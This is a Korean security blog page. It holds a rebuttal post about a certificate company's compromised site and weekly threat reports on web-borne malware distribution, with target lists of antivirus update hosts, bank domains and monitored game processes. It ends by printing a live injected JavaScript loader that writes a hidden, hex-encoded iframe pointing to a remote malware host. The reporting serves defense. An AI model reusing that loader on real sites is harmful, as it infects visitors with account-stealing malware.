태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'해킹'에 해당되는 글 253건

  1. 2012.11.26 악성코드와 금융 그리고 한국. ( 간단한 반박)
  2. 2012.06.21 6월 2주차 국내 인터넷 위협 동향 브리핑
  3. 2012.06.15 6월 1주차 국내 인터넷 위협 동향 브리핑
  4. 2012.06.06 5월 5주차 인터넷 위협 보고서 - Malware Net 그리고 APT
  5. 2012.05.30 5월 4주차 인터넷 위협분석 (루트킷.)
  6. 2012.05.24 5월 3주차 공격 동향
  7. 2012.05.22 IBM 해킹에 비춰본 웹서비스 보안
  8. 2012.04.02 Malware launch detected !!!
  9. 2011.12.06 History of p4ssion (바다란) (2)
  10. 2011.11.22 Mola Mola와 위기의 인터넷
  11. 2011.11.01 해외 보안 이슈 촌평 및 간략 2011.11.1
  12. 2011.09.11 [갱신]구글이 탐지 할 수 없는 위험과 신호 20110910
  13. 2011.09.01 진짜 SaaS (Security as a service)의 시작에서
  14. 2011.08.25 해외 보안기사 및 현실에 대한 비평 - 8.25
  15. 2011.07.01 룰즈섹(LulzSec)이 대수인가? (1)
  16. 2011.06.26 해외 ISP가 악성코드 경유지 주소로 직접 활용된다.
  17. 2011.05.26 거인의 몰락 (소니)
  18. 2011.05.16 소니,현대캐피탈 -시작된 위기
  19. 2011.05.11 최근 해킹이슈에 대한 '마이너리티 리포트'
  20. 2011.04.28 공격도구로의 웹과 대응 - 악성코드 동향 및 7500만의 해킹에 붙여
  21. 2011.04.20 2년 후의 사이버 보안에 대하여 - 미국
  22. 2011.04.11 현대캐피탈 해킹. 시사점과 지금의 문제 (2)
  23. 2011.03.28 Mysql.com과 Sun의 DB 유출- Blind sql injection (1)
  24. 2011.03.26 p2p 및 악성코드 유포지에 대한 심각한 문제제기.
  25. 2010.12.25 경유지의 폭발적 변화와 확산. 이건 징후라고 봐야 할 사안들
  26. 2010.12.20 구글의 악성코드 차단 정책의 선회가 가지는 의미
  27. 2010.12.06 악성코드의 반복적인 발생과 대규모 유포의 원인
  28. 2010.10.22 스마트 시대의 보안 대처법과 대응전략 -인터뷰
  29. 2010.10.19 Stuxnet (SCADA) 대응과 앞으로의 과제
  30. 2010.10.07 Facebook 사건과 8억달러의 벌금 - 기사분석 (12)

지금 한 회사가 문제가 아니라, 이 IT 서비스 분야 전체에 걸친 심각한 문제라는 점이다. 전자상거래가 차지하는 부분.. 그리고 테스트서버라는 부분도 문제이고 연동되어 있는 실제 스크린샷이 있는데도 손바닥으로 장대비를 가리는 형국


지금의 문제는 공인인증서 관리 업체 하나의 문제가 아니라 기반 체제의 문제점이라는 점이고 또 하나는 DMZ zone 에 위치한 서버가 권한 탈취를 당했다는 것은 심각한 상황이라는 것이다.


10월 하순부터 신규로 만들어진 악성링크가 소스코드 복사를 통해 들어가 있었다는 해명은 황당하기 그지 없다. 또한 구글은 내부에 포함된 악성링크를 가지고 판단 하는 체계가 아니며, Drive by download 즉 해당 웹 서비스에서 악성파일이 내려 올때에만 Alert을 하는 체제이다. 현재 다운로드 이벤트가 없는 비정상적인 링크를 대규모로 추적하는 곳은 세계적으로 빛스캔만이 유일한 곳이다.


변명을 하고 해명을 할 때가 아니라 전체의 안정을 위해 대단한 노력을 기울여야 할 시점인데도 불구하고...  


악성링크가 들어 있는 소스가 복사 되어 사용 되었기 때문에 문제가 없다는 것은 사기다.  그 악성링크는 유포 통로로서 이용이 된다. 즉 공격자가 수시로 내용을 채워 넣고 지우는 형태라서 꾸준히 추적을 못한 경우 정체를 알 수가 없다. 우린 이미 추적을 해오고 있었고 그 기록을 다 유지하고 있다.


방문 했을때의 스크린 샷을 보면 악성링크도 불려지는 것을 확인 할 수 있다. 그 이야기는 테스트(?) 서버라고 주장하는 것이 언제부터 연동 되었는지 알 수 없지만 이미 한참 이전 부터 악성코드 유포에 사용 되고 있었음을 의미한다. 


실제 데이터까지 다 있는 마당에 이제와서....무슨 궤변이던가?





위의 이미지는 악성링크가 들어 있는 시점에 한국전자인증을 방문하여 첫 페이지에서 불려지는 모든 링크를 체크한 부분의 이미지다.  테스트 서버라고 하면 왜 메인 웹서비스와 연동이 되어 있었는가?  또한 해당 악성링크는 이미 발견 당일에도 악성코드 유포 이슈가 감지된 악성링크인데 왜 영향이 없다고 하는가?


테스트 서버라고 하면 영향이 없다는 것은 말이 안되는 부분이며, 연결 되는 순간 영향력은 동일하다.  모든 방문자가 해당 회사를 어떤 방식으로든 방문 하게 되면 내부의 링크들은 그대로 다 불려진다. 10월 하순 부터 활성화된 악성링크는 11월 19일까지 계속해서 영향을 미치고 있었다.  


우린 대규모 유포망의 변화와 추적에만 신경을 쓰고 있었고 하위 유포 통로의 경우 매우 심각하거나 반복적인 이슈가 있을때에만 정보 제공 및 기사화를 통해 주의 환기를 시키는 정도 였으나 본 사안의 경우 심각성이 도를 넘어선 상태여서 강력한 개선과 점검을 통해 보완을 해야만 현재의 위기를 막을 수 있다고 언급한 부분들이다.


연결된 화면과 변화된 내역을 모두 데이터로 가지고 있으며 최종 설치된 악성코드가 어떤 일을 하는지도 분석이 된 상황에서 지금도 아무런 영향과 피해가 없다고만 하는 것이 옳은 것인가에 대해서 고민해야 할 것이다.


인터넷은 연결 되어 있다. 그 한축이 무너지면 균형을 잃게 된다. 지금은 그 균형을 잃기 직전의 상황일 수도 있기에 문제제기를 하는 것이고 해당 악성링크의 역할과 위험성에 대해서 모른다면 앞으로 강력하게 컬럼 및 기사화를 통해 알릴 것이다. 


단순히 악성코드 유포가 기사화 되는 것에만 집중하지 말고 또 10월 말에 생성된 악성링크를 코드 복사 하다가 붙여 넣어졌다는 엄청나게 오해스러운 설명으로 덮으려고 하지 말아야 한다. 구글의 악성코드 감염 위험을 나타내는 Safebrowsing 화면은 좀 자세히 알고 해명에 올리길 바란다. 구글은 무조건 Drive by download 가 발생되면 내부의 악성링크와 관계 없이 위험성을 알리는 차원에서 세이프 브라우징에 등록된다.  즉 방문 했을때 이벤트가 발생 되어야 하고 그 이벤트 발생되어 내려온 파일이 위험성이 있을때 차단을 하는 것이다. 단순히 아무 영향이 없는 링크가 악성링크로 이용이 된다고 하여 차단을 하지는 않는다는 점이다.


그러므로 DMZ Zone 내의 서버가 공격당한 것은 사실이며, 공격자에 의해 악성코드 유포에 이용 되었다는 것은 치명적인 결과라 할 수 있을 것이다. 더군다나 공격자가 악성링크를 이용하여 악성코드 감염을 위한 숙주로 이용하는 것은 정말 마지막 단계에서나 버리는 수준에서 ( 노출이 되니..) 사용이 되는 기법이다.  권한 획득 하고 단지 악성코드 유포만을 할까?  농협도 악성코드로 인해 내부로 들어온 공격자들에 의해 전체가 중단 되었다. 그러나 이건 우연한 침입이 아니고 의도된 침입이 아닐까? 그리고 그 모든 일들이 완료 되어 장난삼아 악성코드 유포에 이용 한 것은 아닐까?


농락 당하는 것이 지금의 한국 인터넷 상황이다. 농락..


전체에 대한 확인이 필요할 것이다. 그것도 아주 강도 높은 수준의...


좀 더 상세한 내용과 설명이 필요한 부분들은 앞으로 계속 지적 할 것이다.  


http://deepers.net/archives/1357


데이터 및 우려하는 부분에 대한 내용은 컬럼에 상세하게 기술이 되어 있다.  변화되는 내용들에 대해서는 www.facebook.com/bitscan 에서 계속 갱신 되고 공유 될 것이다.


- 바다란



Posted by 바다란


빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 6월 2주차 국내 인터넷 환경의 위협 분석 내용이며 본 보고서는 빛스캔의 PCDS ( Pre Crime Detect System) 와 KAIST 보안센터의 분석 역량이 결집된 분석 보고서 입니다. 매주 수요일 한 주간의 국내 인터넷의 실질적인 위협 동향을 분석하고 대응을 하도록 방향 제시를 하고 있습니다.



본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라, 대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다. 모든 IP 주소와 도메인 명은 가려지며 보고서 서비스의 구독을 하시는 기업 / 기관에는 공개적으로 기술이 됩니다.


본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 기술 분석 문서 참고)


*금주 차 보고서 형태가 변경 되었습니다. 동향 분석은 그대로 이고 기술 분석이 각 사용 되는 취약성 부류에 따라 별개 문서로 작성 되었으나 하나의 문서에 유형별로 정리가 되어 있습니다. 중복된 해결 방안이 다수 제거한 형태로 변경 되었으니 참고 하세요. 또한 기술분석 보고서에는 최종 악성코드 다운로드 경로까지 기술 되어 있습니다.



금주 차의 특징은 신규 악성링크는 전주 대비 100% 이상 증가 하였으며 5월 보고서부터 언급하였던 Malware Net의 활동이 본격적으로 개시 되었습니다.

악성링크에 대해 대규모 변경과 추가가 계속 발생 되고 있습니다. 신규 악성링크의 수치는 전주 대비 대폭 증가 하였으며, 해당 악성링크들이 Malware net을 통해 대규모로 전파 되었고 수시로 변경 되는 형태를 나타내고 있습니다. 지난주에 250여곳 이상에서 관찰된 Malware net은 금주 활동이 축소 되었고 신규 Malware-net이 가동 되었습니다.


규모 면에서는 매주 마다 최대규모를 갱신하고 있는 상황이며, 중간 경로를 이용한 효율적 공격들이 대규모로 관찰 되고 있어서 영향력과 위험성은 계속 증가 하고 있습니다.



큰 특징은 다음과 같습니다.



  • 거대 Malware net의 확장과 변화 ( 최대규모 350여개 이상의 사이트에서 운영) -6월 1주차 250여개의 웹서비스에서 악성코드 중계로 사용 되었던 링크( www.xxx.or.kr/popup_img/popup.js ) 는 현재 140여 곳으로 줄었으며 주말을 기해 악성링크가 추가 되고 삭제 되기를 반복 하였습니다. 5월 5주차 보고서에서 언급 하였던 Malware Net ( http://www.xxxxxxx.com/script/js/script.js) 은 공개 이후 대폭 줄어 들었으나 또 다른 중계 링크로 대거 전환이 되었습니다. 6월 2주차에 전환된 Malware net은 ( www.xxxxxxx.com/school02/flash/view.js ) 이며 213여 곳 이상의 웹 서비스에 추가 되어 중계 되었습니다. 두 곳의 Malware net을 통해 350여 곳 이상의 웹 서비스에서 악성링크를 중계한 사례가 발생 되었습니다.

* 현재 발견 된 것 중에서도 대규모 Malware net 이외에 다수의 Malware net이 운영 중입니다. 단 1~2일 만에 수 백여 개의 웹 서비스에 추가될 정도로 정교하고 대량 변조가 가능한 공격 도구를 확보한 것으로 추정 됩니다.

* 전략적인 측면에서 탐지 회피를 위한 다수의 기법들이 사용 되었고 이 중에는 다수의 중간 경유지를 활용하여 최종 악성링크 판별이 어렵도록 하는 시도가 금주 차에 대거 발견 되었습니다.


  • 몇몇 은행의 인터넷 뱅킹을 특정 사이트로 유도하기 위한 공격의 온라인 전파 ( Drive by download 파일 업데이트가 아닌 웹 서비스 방문을 통한 대규모 유포 시도)

  • 분석 방해를 위한 Virtual machine 회피 기법 활용 국내 주요 백신에 Killing, 거의 대부분의 게임에 대한 프로세스 모니터링 대규모 발견 ( 디아블로 3 계정 탈취형 악성코드 대량 유포 발견)

  • 백신 업데이트 방해를 위한 다양한 백신 업데이트 주소에 대한 Host 파일 변조 발견 , 루트킷에 의한 삭제 및 악성 프로세스 보호 기능 추가된 악성코드 유포

* 악성코드 자체에서 분석방해를 위한 VM (가상머신) 과 디버거를 탐지 하여 실행 흐름의 변경 및 실행 시 난독화를 적용하여 판단 및 분석을 어렵게 하는 기능이 다수 발견 됨

  • 백도어 키로거 기능의 악성코드 유포 증가 - 6.18일 부터 Mass sql 공격의 일종으로 추가된 nmmkmm.com/r.php 링크가 신규 발견 되어 확산 중입니다.


  • 산호세에 위치한 호스팅 업체에 배정된 IP 대역을 대규모로 악성링크로 활용 하였습니다. 호스팅 업체는 EGI Hosting 입니다.


* IE 관련된 zero day 공격 코드가 공개 되어 활용 되고 있습니다. 향후 대규모 공격에 사용 될 수 있으므로 주의를 기울여야 합니다. 대규모 유포 발생 시 즉시 반영 되어 알려 드리도록 하겠으며, 현재 까지 대규모 유포로 출현 하지는 않았습니다.

CVE 2012-1889 : MSXML Memory Corruption, CVE 2012-1875 IE Same ID Use After Free





금주 월요일 기준 통계에 의하면 발견된 악성링크 흔적은 2600여 곳 이상이며 Malware Net은 거대 Malware net 두 곳이 현재도 활동 중에 있습니다. 또한 근본 취약성 및 백도어를 제거 하지 못한 상태에서 악성링크로 사용 되는 js 파일만을 삭제하는 것은 대책이 될 수 없으며, 언제든 공격자가 원하는 시점에 계속 해서 악성코드 유포에 이용 할 수 있는 상황임을 알고 본 보고서를 받으시는 기업/ 기관에서는 반드시 차단 정책을 적용 하시기 바랍니다.


금주의 악성코드 유포지로 직접 이용된 웹서비스들은 380여 개 이상이며 전주 대비 증가 되었으며, 악성코드가 실제로 내려오는 악성링크의 수치가 전주 대비 100% 이상 증가한 상태를 나타내고 있는 것은 그만큼 공격자들의 공격과 변화가 활발했음을 의미합니다. 5월 보고서에서 최초 언급 되었던 Malware net들은 그 활용도가 이제 적정 기준점을 넘은 활발한 활동을 보이고 있으며 빠른 시간 내에 변경 되는 것으로 관찰 되고 있어서 향후의 위험성에 대해서 강도 높은 우려를 표명합니다. 현재 상태는 공격자가 매우 높은 수준의 자유도를 가지고 자유롭게 활동 하고 있는 단계에 까지 올라선 상황입니다.


5월 5주차 보고서에 언급된 Malware net ( http://www.xxxxxxx.com/script/js/script.js) 의 40% 가량이 6월 1주차 Malware net ( www.xxx.or.kr/popup_img/popup.js ) 250여 곳으로 확산 되었으며 6월 2주차에서는 6월 1주차의 Malware net ( www.xxxx.or.kr/popup_img/popup.js ) 은 140여 곳으로 축소 되어 활용 되었으며 추가 Malware net 인 ( www.xxxxxx.com/school02/flash/view.js ) 213 여곳 이상에서 활동이 관찰 되었습니다.

Malware net의 범위는 계속 확장 되고 빠른 변화를 보이고 있어서 향후 Malware net에 대한 변화와 영향력 추적에 계속 집중 할 예정입니다.

( 현재 Malware net 으로 사용된 링크들은 수시로 활성화가 되고 있습니다. 클릭 시 주의 바랍니다. 5월 5주차 언급된 링크는 현재 시간에도 살아 있는 상태를 유지 하고 있습니다. )



악성링크 자체 및 웹서비스 전체적으로 문제점 개선이 이루어 지지 않고, 악성코드 유포 인지도 못하는 상태는 계속 되고 있습니다. 또한 대응이라고 해봐야 근본 원인 제거 없이 악성링크가 추가된 부분만을 제거하는 것이 대응의 전부이다 보니, 공격대상에 포함된 모든 서비스들이 재활용 되는 악순환이 계속 되고 있습니다. 이제 공격자들은 자유로운 재활용을 넘어, 악성코드에 감염된 좀비 PC의 대규모 확산을 위해 악성코드 유포지를 대폭 늘리고 직접 활용을 하는 단계로 전환된 상태를 계속 유지하고 있습니다.


전체적으로 금주 국내 인터넷 서비스를 통한 악성코드 감염 및 좀비 PC 감염 비율은 상당히 높은 상태를 유지한 것으로 판단되며 금융권에 대한 정보유출을 위한 악성코드도 대규모 활동을 함으로써 강도 높은 경계 단계로 진입 되었습니다. 백신의 업데이트 방해 및 자기 보호를 위한 기능 강화 및 유명 게임에 대한 계정 탈취형 코드가 웹을 통해 대규모 유포가 발생한 상황입니다.



6 2주차 특징은 다음과 같습니다. ( 모든 IP와 URL 정보는 공식 보고서에만 공개 됩니다. )



특징


· · 다양한 취약성을 이용해 공격 성공 비율을 높이는 형태 계속 ( 최대 6종류의 취약성을 동시에 이용한 공격 코드 출현)


· · 악성코드 유포지의 대폭 증가 및 대량 유포 현실화 - 향후 지속 예상


· · 악성코드 유포자들의 전략적 행위 증가 및 범위 확대와 재활용 증가 ( 악성링크 자체의 탐지 회피를 위한 다양한 기법 동원)


· · 악성코드 분석 자체를 방해하기 위한 가상머신 우회기술, 루트킷(APT 형태) 유포 계속


· · 3월부터 사용되었던 주요 악성링크 및 악성코드의 대규모 재활용 계속 및 주요 게임 및 백신 모니터링 및 업데이트 방해를 위한 Host 파일 변조 발견



백신 업데이트 서버

변경 IP

vaccine.dn.naver.com

49.111.xxx.36

explicitupdate2.alyac.co.kr

125.234.xxx.36

liveupdate2.alyac.co.kr

105.105.xx.37

explicitupdate.alyac.co.kr

85.109.xx.37

ko-kr.alupdatealyac.altools.com

241.88.xx.37

su.ahnlab.com

45.135.xx.37

gms.ahnlab.com

21.110.xxx.37

update.ahnlab.com

33.55.xxx.37


· 은행 사용자를 겨냥한 Host 파일 변조 기능의 악성코드 유포


금융권 대상의 피싱 사이트 연결 대상

사이트명

은행명

은 행

www.kbstar.com

국민은행

kbstar.com

obank.kbstar.com

banking.nonghyup.com

농협

www.wooribank.com

우리은행

wooribank.com

pib.wooribank.com

bank.keb.co.kr

외환은행

www.keb.co.kr



* 악성링크를 중계하는 웹서비스의 증가는 웹서핑시 감염될 확률이 더욱 높아짐을 의미합니다.


* 유포지와 중계지의 의미는 사용자 관점 이나 악성링크의 관점에서 다를 수 있습니다. 저희는 사용자 관점에서 웹 서핑시 방문한 웹서비스가 문제가 있어서 감염이 된다면 직접 방문한 사이트는 ‘ 악성코드 유포지’ , 악성코드를 받아 오게 하는 임의의 주소를 ‘ 악성링크’ , 최종 사용자에게 감염을 일으키는 파일 자체를 ‘악성코드’ 로 정의 하고 있습니다.




사용자 PC에 대한 직접적인 공격을 일으키는 금주의 취약성은 주요 취약성 5개 가량에 집중이 되어 있으며 전주와 동일하게 Oracle Java 취약성에 대한 공격 비율이 가장 높은 비율을 차지 하고 있습니다. 또한 루트킷 및 APT 형태의 감염을 위해 사용자 PC에 디바이스 드라이버를 설치한 상태에서 내부 대역 스캔 및 특정 IP로 연결 하는 형태는 한번 감염시 막대한 피해를 감내해야 하는 부분이므로 강력한 보호 방안 수립이 요구 되고 있습니다. 패치 이외에도 다양한 방안을 강구해야 문제 해결 할 수 있으며 현재 모든 보안 솔루션들이 사후 대응에 중점을 맞추고 있는데 가장 중요한 것은 사전에 대응이 얼마나 되고, 발생 가능한 위험을 제거 했느냐가 핵심이 되어야 합니다.


· Oracle Java 취약성, Adobe Flash 취약성 , MS Midi IE 취약성이 같이 사용 되어 공격 성공 비율을 높이는 경우가 꾸준히 관찰 되고 있으므로 전체 보안 수준 관리에 노력을 기울일 필요가 있습니다.


· 기술분석 보고서에 기술된 루트킷 및 키로거, 백도어 기능을 가진 악성코드들은, 사용자 PC의 드라이버 및 시스템 파일 교체, 윈도즈 서비스 등록등을 실행하고, 내부망 스캔 및 키로깅 그리고 외부에서 명령을 대기하는 행위가 지속 관찰 되고 있어서 위험성이 높습니다.


· 기술분석보고서에 언급된 백도어들은 상당히 많은 악성링크들이 이용되고 있어서 현재 공격자들이 주력하는 부분으로 판단됩니다. 모두 시스템에서의 백신 프로세스를 중지 시키고 국내.외 거의 모든 게임에 대한 프로세스를 지속적으로 모니터링 하고 있으며 현재 목적은 게임계정 탈취로 보여지고 있으나 언제든 외부 도메인 연결과 업데이트를 통해 다른 형태로 전환이 될 수 있습니다.



모니터링 하는 프로세스의 종류는 하기와 같으며 국내의 대부분 백신 프로세스 이외에 거의 모든 국내의 게임들에 대해서 모니터링을 하고 있습니다. 게임종류는 국내.외 게임사들의 주력 게임들이 모두 해당 되고 있으며, 그 동안 산발적으로 발견 되었던 디아블로 3 관련된 게임 계정 탈취형 악성코드 기능이 웹을 통해 대규모 유포 되었습니다. 금주 차부터 해킹 신고 및 사고 신고가 급증 할 것으로 예상 됩니다.


·

프로세스명

프로그램명

백 신

sgbider.exe, vcsvc.exe

vcsvcc.exe

바이러스체이서

NVCAgent.npc, nsvmon.npc

Nsavsvc.npc, NaverAgent.exe

네이버백신

V3LRun.exe, MUpdate2.exe

SgSvc.exe

V3Light.exe, V3LTray.exe

V3LSvc.exe

V3

AYUpdSrv.aye,

AYRTSrv.aye, SkyMon.exe

AYServiceNT.aye

AYupdate.aye, AyAgent.aye

알약

PCOTP.exe

넥슨 OTP

게 임

gamehi.co.kr

게임하이

hangame.com

한게임

netmarble.net

넷마블

Raycity.exe

레이시티

ff2client.exe

피파 온라인2

pmang.com

피망

df.nexon.com, dnf.exe

던전 앤 파이터

DragonNest.exe

드래곤 네스트

WinBaram.exe

바람의 나라

heroes.exe

마비노기 영웅전

wow.exe

월드 오브 워크래프트

lin.bin

리니지

MapleStory.exe

메이플 스토리

Diablo III.exe

디아블로III






본 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 및 감염입니다.

APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다. 대응에 참고 하십시요.



사용된 취약성 비율



- CVE 2011-3544 ( 25.5%) Java Applet 취약성

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 36%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (20.2%) Windows Midi 취약성

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003

- CVE 2012-0754 (24.2%) Flash 취약성

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (2.2%) IE 취약성 ( IE 6,7 대상)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806


-CVE 2011-2140 (0.4%) Adobe Flash 취약성



금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다. 또한 미국의 EGI Hosting 사의 IP 대역 상당수를 직접 악성링크로 활용한 사례가 발견 되어 해당 IP 대역에 대해강력한 차단을 유지하실 것을 권고 합니다.


차단 권고 대역



* 각 개별 분석보고서에는 별도의 차단 대역들이 존재하니 참고 하시고 사안별로 모니터링 및 차단에 적극 활용 바랍니다.

-  공식 보고서 및 메일에만 기술 되어 있으며, 공개 게시물에는 삭제됨


현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다. 또한 어떤 방식으로든 빛스캔의 악성링크 탐지와 분석 내용에 대해서 인지를 일부 하고 있는 것으로 보여 전략적인 움직임이 매우 많은 한 주로 총평을 할 수 있으며 향후 외부 공개 수준에 대해서 심각하게 고민을 해야 할 것 같습니다.



주말에만 집중 되던 공격이 금주 에는 주중에도 이미 발생 되어 활발하게 활동이 일어나고 있습니다. 인터넷 서핑 주의를 당부 드려야 할 것 같습니다. Cookie 값 ralrlea를 주의 하세요. 물론 다른 쿠키 값들도 많지만 가장 많은 쿠키로 사용되는 값입니다. 


공익적인 목적으로 기관에 제공 되는 서비스들은 내부 사정에 의해 언제든 종료 될 수 있습니다.

감사합니다.


*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다. KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.



* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.


* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해 수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

Posted by 바다란

빛스캔과 KAIST 사이버보안센터에서 공동 운영하는 보안정보 제공 서비스 6 1주차 국내 인터넷 환경의 위협 분석 내용입니다. 

본 정보제공 서비스는 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 알 수 있도록 하기 위한 것이 주된 목적이며, 공격 형태의 변화에 따라대규모로 확장 및 개선된 상황을 유지하며 운영 되고 있습니다.

모든 IP 주소와 도메인 명은 가려지며 보고서 서비스의 구독을 하시는 기업 / 기관에는 공개적으로 기술이 됩니다.


 본 보고서의 활용 용도는 다음과 같은 활용이 가능합니다.

 


1. 악성링크 및 악성코드 유포에 이용되는 IP 대역 차단을 통한 좀비 PC 감염 방지

2. 악성링크가 공격에 활용하는 주된 취약성에 대한 내부 보안 강화 정책 - 패치

3. 내부 감염된 APT 공격의 확인 및 제거에 활용 ( 각 개별 기술 분석 참고)


 


금주 차의 특징은 공격자들의 전략적인 공격이 대폭 확대 되고 있습니다악성링크에 대해 대규모 변경과 추가가 계속 발생 되고 있습니다신규 악성링크의 수치는 전주와 유사하며 신규 악성코드만 일부 증가된 형태를 보이고 있습니다그러나 실제 악성링크 하나가 전주에 관찰 되었듯이 최소 10 ~ 최대 100 개 이상의 웹서비스에서 동시에 중계된 사례가 발생 하였으며 금주에는 최대 250개 이상의 사이트에서 동일 링크가 중계되는 관찰이래 최대치의 악성링크 확산 사태가 발생 하였습니다. 즉 중간 경로를 이용한 효율적 공격들이 대규모로 관찰 되고 있어서 영향력 면에서는 지난주의 100여개 이상의 사이트에서 유포된 사례와 비교하여 위험성은 더 대규모로 확대된 상태 입니다.



 큰 특징은 다음과 같습니다.



         * 현재 발견 된 것 중에서도 대규모 Malware net 이외에 다수의 Malware net이 운영 중에 있습니다. 규모는 작으나 언제든 대규모 확장이 가능한 상태로 유지됨

  • 몇몇 은행의 인터넷 뱅킹을 특정 사이트로 유도하기 위한 공격의 온라인 전파 ( Drive by download  파일 업데이트가 아닌 웹 서비스 방문을 통한 대규모 유포 시도)

http://www.dailysecu.com/news_view.php?article_id=2363 에서 기사화된 내용과 동일한 내용이나 특정 방송의 업데이트나 일부에 국한된 문제가 아니며 대규모 Malware net을 통해 방문자들 모두에게 대량 유포되는 형태로 유포 되었으며 국내에 매우 많이 확산 되어 있을 것으로 판단 됩니다. )


  • 분석 방해를 위한 Virtual machine 회피 기법 활용  국내 주요 백신에  Killing, 거의 대부분의 게임에 대한 프로세스 모니터링 대규모 발견


  • 백도어  키로거 기능의 악성코드 유포 대폭 증가 - 6.10일 부터 Mass sql 공격의 일종으로 추가된  fjuhgk.com/r.php 링크가 신규 발견 되어 확산 중입니다.


부수적으로 중앙일보에 대한 페이지 변조 사건이 있었습니다만 저희쪽에 감지된 일부 언론사의 경우 실제 악성코드 유포에 직접 활용 되었으며  언론사는 조선일보 입니.  저희쪽에 감지된 악성링크가 추가된 url 은 xxxxxxx.chosun.com/inc/scripts.js 이나 전체적으로 문제가 있었을 것으로 예상 되고 있습니다.  

방문시 실행 되는 악성링크는 50.117.xxx.86/image/img.js 입니다. 시스템 상에 백도어 설치를 통해 게임 계정 정보를 유출 하는 악성코드의 일종이 설치 되었습니다. 1주일 동안 발견된 악성코드 흔적 2300여 곳중 하나일 뿐입니다.  중앙일보 페이지 변조 보다 수준 높은 악성코드 유포가 그만큼 많이 일어나고 있는 현재의 모습일 뿐입니다.



 


금주의 악성코드 유포지로 이용된 웹서비스들은 300여곳 이상이며 전주 대비 대폭 감소 되었으나 실제로는 600여곳 이상에서 악성코드를 중계 하였습니다.  전주 대비 감소의 이유에는 250여 곳 이상의 서비스에서 악성코드를 유포한 악성링크가 이미 지난 3월에 발견된 악성링크로서 금주의 신규 악성링크 통계에는 빠져 있어서 통계치의 왜곡이 발생 되었습니다3월에 소규모였던 악성링크 확산 규모가 주말 단 2일 동안에 250여 개 이상의 웹 사이트에서 중계를 하도록 확장 되는 심각한 국면이 전개 되고 있습니다. 6 1주차의 전체 악성링크 흔적이 발견된 곳은 2300여 곳입니다.

 


현재도 매우 활발하게 범위를 확산 시키고 있고 단 이틀 만에 250개 이상의 취약한 웹서비스들에 악성링크를 추가하는 적극적인 공격이 계속 확산 되고 있습니다. 악성링크가 삽입된 웹서비스들

의 대응이 많이 부족한 상태라 계속 재발 되고 있으며, 대규모 감염을 시키기 위해 사용자가 방문 시 감염 될 수 있는 사이트들을 대규모로 확장하여 거대 네트워크를 운영 중입니다. 악성코드 전파용인 Malware net 은 금주의 관찰 결과 지난주 관찰되었던 백여 개 이상의 웹서비스들에서 중계되었던 http://www.xxxxxxxxx.com/script/js/script.js 악성 중계 링크의 경우 이 중 40% 가량이 금주 공격에 이용된 www.xxx.or.kr/popup_img/popup.js  전환되는 현상이 관찰 되었습니다 공격자가 Active 하게 활용   있는 상태라 확인이 되고 있습니다.

 

www.xxx.or.kr/popup_img/popup.js -> 추가된 악성링크 내용

 

if(document.cookie.indexOf('ralrlea')==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);document.cookie='ralrlea=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%30%71%6C%2E%69%6E%66%6F%2F%77%6D%2F%68%75%69%77%65%69%2F%69%6E%64%65%78%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D%27%31%30%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));}

 

Hex  Decode 

